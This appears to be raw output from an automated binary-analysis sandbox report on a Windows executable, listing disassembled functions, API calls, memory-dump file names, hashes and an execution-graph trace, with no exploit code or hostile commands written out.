                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PlacementWindowmemset
                                                                                                                                                                                    • String ID: WinPos
                                                                                                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                                                                                                    • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                    Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                                                    • API String ID: 383090722-1948609170
                                                                                                                                                                                    • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                    Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                    • API String ID: 2773794195-880857682
                                                                                                                                                                                    • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                    Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                                                                                    • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LongWindow
                                                                                                                                                                                    • String ID: MZ@
                                                                                                                                                                                    • API String ID: 1378638983-2978689999
                                                                                                                                                                                    • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                    • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                                                                                    Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                    • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                    • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                    Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                    Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                    • free.MSVCRT ref: 0040A908
                                                                                                                                                                                    • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                                                    • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                    Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                    • free.MSVCRT ref: 0040B201
                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                    • free.MSVCRT ref: 0040B224
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                                                    • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                    • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                    Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                    • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                                                    • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 231171946-0
                                                                                                                                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                    Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                    • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                    • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3669619086-0
                                                                                                                                                                                    • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                    Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                    • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                    • free.MSVCRT ref: 00417425
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                    • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                    Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1961120804-0
                                                                                                                                                                                    • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                    • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:2.4%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                                                                                    Signature Coverage:0.5%
                                                                                                                                                                                    Total number of Nodes:871
                                                                                                                                                                                    Total number of Limit Nodes:22
                                                                                                                                                                                    execution_graph 34104 40fc40 70 API calls 34277 403640 21 API calls 34105 427fa4 42 API calls 34278 412e43 _endthreadex 34279 425115 76 API calls 34280 43fe40 133 API calls 34108 425115 83 API calls 34109 401445 memcpy memcpy DialogBoxParamA 34110 440c40 34 API calls 34112 411853 RtlInitializeCriticalSection memset 34113 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34286 40a256 13 API calls 34288 432e5b 17 API calls 34290 43fa5a 20 API calls 34115 401060 41 API calls 34293 427260 CloseHandle memset memset 33168 410c68 FindResourceA 33169 410c81 SizeofResource 33168->33169 33172 410cae 33168->33172 33170 410c92 LoadResource 33169->33170 33169->33172 33171 410ca0 LockResource 33170->33171 33170->33172 33171->33172 34295 405e69 14 API calls 34120 433068 15 API calls 34297 414a6d 18 API calls 34298 43fe6f 134 API calls 34122 424c6d 15 API calls 34299 426741 19 API calls 34124 440c70 17 API calls 34125 443c71 44 API calls 34128 427c79 24 API calls 34302 416e7e memset 34132 42800b 47 API calls 34133 425115 85 API calls 34305 41960c 61 API calls 34134 43f40c 122 API calls 34137 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34138 43f81a 20 API calls 34140 414c20 memset memset 34141 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34309 414625 18 API calls 34310 404225 modf 34311 403a26 strlen WriteFile 34313 40422a 12 API calls 34317 427632 memset memset memcpy 34318 40ca30 59 API calls 34319 404235 26 API calls 34142 42ec34 61 API calls 34143 425115 76 API calls 34320 425115 77 API calls 34322 44223a 38 API calls 34149 43183c 112 API calls 34323 44b2c5 _onexit __dllonexit 34328 42a6d2 memcpy 34151 405cda 65 API calls 34336 43fedc 138 API calls 34337 4116e1 16 API calls 34154 4244e6 19 API calls 34156 42e8e8 127 API calls 34157 4118ee RtlLeaveCriticalSection 34342 43f6ec 22 API calls 34159 425115 119 API calls 33158 410cf3 EnumResourceNamesA 34345 4492f0 memcpy memcpy 34347 43fafa 18 API calls 34349 4342f9 15 API calls 34160 4144fd 19 API calls 34351 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34352 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34355 443a84 _mbscpy 34357 43f681 17 API calls 34163 404487 22 API calls 34359 415e8c 16 API calls 34167 411893 RtlDeleteCriticalSection 34168 41a492 42 API calls 34363 403e96 34 API calls 34364 410e98 memset SHGetPathFromIDList SendMessageA 34170 426741 109 API calls 34171 4344a2 18 API calls 34172 4094a2 10 API calls 34367 4116a6 15 API calls 34368 43f6a4 17 API calls 34369 440aa3 20 API calls 34371 427430 45 API calls 34175 4090b0 7 API calls 34176 4148b0 15 API calls 34178 4118b4 RtlEnterCriticalSection 34179 4014b7 CreateWindowExA 34180 40c8b8 19 API calls 34182 4118bf RtlTryEnterCriticalSection 34376 42434a 18 API calls 34378 405f53 12 API calls 34190 43f956 59 API calls 34192 40955a 17 API calls 34193 428561 36 API calls 34194 409164 7 API calls 34382 404366 19 API calls 34386 40176c ExitProcess 34389 410777 42 API calls 34199 40dd7b 51 API calls 34200 425d7c 16 API calls 34391 43f6f0 25 API calls 34392 42db01 22 API calls 34201 412905 15 API calls 34393 403b04 54 API calls 34394 405f04 SetDlgItemTextA GetDlgItemTextA 34395 44b301 ??3@YAXPAX 34398 4120ea 14 API calls 34399 40bb0a 8 API calls 34401 413f11 strcmp 34205 434110 17 API calls 34208 425115 108 API calls 34402 444b11 _onexit 34210 425115 76 API calls 34213 429d19 10 API calls 34405 444b1f __dllonexit 34406 409f20 _strcmpi 34215 42b927 31 API calls 34409 433f26 19 API calls 34410 44b323 FreeLibrary 34411 427f25 46 API calls 34412 43ff2b 17 API calls 34413 43fb30 19 API calls 34222 414d36 16 API calls 34224 40ad38 7 API calls 34415 433b38 16 API calls 34095 44b33b 34096 44b344 ??3@YAXPAX 34095->34096 34097 44b34b 34095->34097 34096->34097 34098 44b354 ??3@YAXPAX 34097->34098 34099 44b35b 34097->34099 34098->34099 34100 44b364 ??3@YAXPAX 34099->34100 34101 44b36b 34099->34101 34100->34101 34102 44b374 ??3@YAXPAX 34101->34102 34103 44b37b 34101->34103 34102->34103 34228 426741 21 API calls 34229 40c5c3 125 API calls 34231 43fdc5 17 API calls 34416 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34234 4161cb memcpy memcpy memcpy memcpy 33173 44b3cf 33174 44b3e6 33173->33174 33179 44b454 33173->33179 33174->33179 33186 44b40e GetModuleHandleA 33174->33186 33176 44b45d GetModuleHandleA 33180 44b467 33176->33180 33177 44b49a 33199 44b49f 33177->33199 33179->33176 33179->33177 33179->33180 33180->33179 33181 44b487 GetProcAddress 33180->33181 33181->33179 33182 44b405 33182->33179 33182->33180 33183 44b428 GetProcAddress 33182->33183 33183->33179 33184 44b435 VirtualProtect 33183->33184 33184->33179 33185 44b444 VirtualProtect 33184->33185 33185->33179 33187 44b417 33186->33187 33189 44b454 33186->33189 33218 44b42b GetProcAddress 33187->33218 33191 44b45d GetModuleHandleA 33189->33191 33192 44b49a 33189->33192 33198 44b467 33189->33198 33190 44b41c 33190->33189 33194 44b428 GetProcAddress 33190->33194 33191->33198 33193 44b49f 777 API calls 33192->33193 33193->33192 33194->33189 33195 44b435 VirtualProtect 33194->33195 33195->33189 33196 44b444 VirtualProtect 33195->33196 33196->33189 33197 44b487 GetProcAddress 33197->33189 33198->33189 33198->33197 33200 444c4a 33199->33200 33201 444c56 GetModuleHandleA 33200->33201 33202 444c68 __set_app_type __p__fmode __p__commode 33201->33202 33204 444cfa 33202->33204 33205 444d02 __setusermatherr 33204->33205 33206 444d0e 33204->33206 33205->33206 33227 444e22 _controlfp 33206->33227 33208 444d13 _initterm __getmainargs _initterm 33209 444d6a GetStartupInfoA 33208->33209 33211 444d9e GetModuleHandleA 33209->33211 33228 40cf44 33211->33228 33215 444dcf _cexit 33217 444e04 33215->33217 33216 444dc8 exit 33216->33215 33217->33177 33219 44b454 33218->33219 33220 44b435 VirtualProtect 33218->33220 33222 44b45d GetModuleHandleA 33219->33222 33223 44b49a 33219->33223 33220->33219 33221 44b444 VirtualProtect 33220->33221 33221->33219 33226 44b467 33222->33226 33224 44b49f 777 API calls 33223->33224 33224->33223 33225 44b487 GetProcAddress 33225->33226 33226->33219 33226->33225 33227->33208 33279 404a99 LoadLibraryA 33228->33279 33230 40cf60 33267 40cf64 33230->33267 33287 410d0e 33230->33287 33232 40cf6f 33291 40ccd7 ??2@YAPAXI 33232->33291 33234 40cf9b 33305 407cbc 33234->33305 33239 40cfc4 33323 409825 memset 33239->33323 33240 40cfd8 33328 4096f4 memset 33240->33328 33245 40d181 ??3@YAXPAX 33247 40d1b3 33245->33247 33248 40d19f DeleteObject 33245->33248 33246 407e30 _strcmpi 33249 40cfee 33246->33249 33352 407948 free free 33247->33352 33248->33247 33251 40cff2 RegDeleteKeyA 33249->33251 33252 40d007 EnumResourceTypesA 33249->33252 33251->33245 33254 40d047 33252->33254 33255 40d02f MessageBoxA 33252->33255 33253 40d1c4 33353 4080d4 free 33253->33353 33256 40d0a0 CoInitialize 33254->33256 33333 40ce70 33254->33333 33255->33245 33350 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33350 33260 40d1cd 33354 407948 free free 33260->33354 33262 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33351 40c256 PostMessageA 33262->33351 33264 40d061 ??3@YAXPAX 33264->33247 33268 40d084 DeleteObject 33264->33268 33265 40d09e 33265->33256 33267->33215 33267->33216 33268->33247 33271 40d0f9 GetMessageA 33272 40d17b CoUninitialize 33271->33272 33273 40d10d 33271->33273 